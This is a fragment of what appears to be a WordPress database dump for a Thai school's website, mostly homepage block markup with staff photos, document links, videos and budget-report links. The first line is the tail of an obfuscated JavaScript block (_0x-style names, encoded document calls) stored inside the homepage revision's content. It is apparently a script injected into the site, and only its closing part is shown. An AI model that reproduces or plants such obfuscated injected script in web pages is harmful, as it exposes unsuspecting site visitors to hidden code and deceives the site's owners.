_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-09-24 11:44:06','2024-09-24 04:44:06','',19,'http://watprato.ssk.in.th/?p=434',0,'revision','',0),
(436,2,'2024-09-24 11:47:35','2024-09-24 04:47:35','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/i-C4sNY7Mf8?si=HVfhH_a_V4qo3m9e\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/i-C4sNY7Mf8?si=HVfhH_a_V4qo3m9e\n</div></figure>\n<!-- /wp:embed --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"full\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" 